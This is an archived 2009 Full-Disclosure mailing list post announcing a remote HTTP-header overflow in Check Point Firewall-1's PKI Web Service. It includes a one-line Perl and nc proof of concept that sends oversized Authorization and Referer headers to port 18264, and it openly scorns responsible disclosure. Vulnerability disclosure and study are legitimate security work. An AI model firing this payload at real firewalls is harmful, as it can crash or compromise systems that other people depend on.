| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 30 Mar 2009 02:16:17 -0600 From: Bugs NotHugs <bugsnothugs@...il.com> To: bugtraq <bugtraq@...urityfocus.com>, fd <full-disclosure@...ts.grok.org.uk> Subject: Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow - Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow - Description The Check Point Firewall-1 PKI Web Service, running by default on TCP port 18264, is vulnerable to a remote overflow in the handling of very long HTTP headers. This was discovered during a pen-test where the client would not allow further analysis and would not provide the full product/version info. Initial testing indicates the 'Authorization' and 'Referer' headers were vulnerable. - Product Check Point, Firewall-1, unknown - PoC perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 . "\r\nFrom: bugs@...s.com\r\nIf-Modified-Since: Fri, 13 Dec 2006 09:12:58 GMT\r\nReferer: http://www.owasp.org/" . "x" x 8192 . "\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc suckit.com 18264 - Solution None - Timeline 2006-11-06: Vulnerability Discovered 2009-03-29: Disclosed to Public -- BugsNotHugs Shared Vulnerability Disclosure Account _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists